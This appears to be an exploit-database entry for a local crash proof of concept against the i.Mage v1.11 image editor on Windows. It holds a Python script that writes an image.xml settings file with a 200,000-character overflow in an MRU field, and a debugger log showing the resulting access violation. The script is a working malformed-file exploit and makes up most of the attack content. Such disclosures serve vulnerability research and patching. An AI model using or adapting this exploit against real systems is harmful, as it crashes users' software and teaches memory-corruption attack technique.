header-logo
Suggest Exploit
vendor:
i.Mage
by:
metacom
5.5
CVSS
MEDIUM
Local Crash
400
CWE
Product Name: i.Mage
Affected Version From: i.Mage v1.11 (Win32 Release)
Affected Version To: i.Mage v1.11 (Win32 Release)
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 32-bit Ultimate
2014

i.Mage Local Crash Poc

This exploit creates a vulnerable image.xml file that can cause a crash in i.Mage software. The vulnerability is caused by an access violation when reading a specific memory address. The exploit author has provided a proof of concept code that fills the image.xml file with a large number of 'A' characters, causing the crash. It is recommended to copy the image.xml file to the installation directory of i.Mage software and start the application to trigger the crash.

Mitigation:

There is no known mitigation or remediation for this vulnerability. It is recommended to avoid using the affected software or update to a patched version if available.
Source

Exploit-DB raw data:

#!/usr/bin/python
#Exploit Title:i.Mage Local Crash Poc
#Homepage:http://www.memecode.com/image.php
#Software Link:http://sourceforge.net/projects/image-editor/files/i.mage-win32-v111.exe/download
#Version:i.i.Mage v1.11 (Win32 Release)
#Description:i.Mage is a small and fast graphics editor slanted towards quite and easy pixel editing...
#Tested on:Win7 32bit EN-Ultimate 
#Exploit Author: metacom
#Date:26.10.2014
'''
Immunity Debugger Log data
Address=77B85FBD
Message=[17:21:47] Access violation when reading [41414145]

EAX 01354078 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01374F10
ESP 0012F810
EBP 0012F838
ESI 01354070 ASCII "AAAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 003A0000
EIP 77B85FBD ntdll.77B85FBD'''
print "\n[*]Vulnerable Created image.xml!"
print "[*]Copy image.xml to C:\Program Files\Memecode\i.Mage"
print "[*]Start i.Mage"
print "[*]------------------------------------------------"

poc="\x41" * 200000
header  = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x45\x72\x61\x73\x65\x57\x69\x64\x74\x68\x3d"
header += "\x22\x31\x30\x22\x0a\x09\x20\x45\x72\x61\x73\x65\x41\x6d\x6f\x75\x6e\x74\x3d\x22\x32\x35\x35\x22\x0a\x09\x20\x44\x73\x70"
header += "\x47\x72\x69\x64\x3d\x22\x31\x22\x0a\x09\x20\x54\x6f\x6f\x6c\x4f\x70\x65\x6e\x3d\x22\x30\x22\x0a\x09\x20\x41\x6e\x67\x6c"
header += "\x65\x3d\x22\x30\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x37\x31\x37\x2c\x33\x34\x30\x2c\x31\x31\x31\x37\x2c\x36\x34\x30\x22"
header += "\x0a\x09\x20\x45\x6e\x61\x62\x6c\x65\x64\x55\x6e\x64\x6f\x3d\x22\x31\x22\x0a\x09\x20\x46\x69\x6c\x6c\x4f\x62\x6a\x65\x63"
header += "\x74\x73\x3d\x22\x31\x22\x0a\x09\x20\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x74\x50\x61\x73\x74\x65\x3d\x22\x30\x22\x0a"
header += "\x09\x20\x4f\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x30\x22\x0a\x09\x20\x41\x6c\x70\x68\x61\x3d\x22\x32\x35\x35\x22\x0a\x09"
header += "\x20\x53\x70\x6c\x69\x74\x74\x65\x72\x50\x6f\x73\x3d\x22\x32\x35\x30\x22\x3e\x0a\x09\x3c\x4d\x72\x75\x20\x49\x74\x65\x6d"
header += "\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x0a" + poc

footer = "\x22\x20\x2f\x3e\x0a\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"

payload=header + footer
writeFile = open ("image.xml", "w")
writeFile.write( payload )
writeFile.close()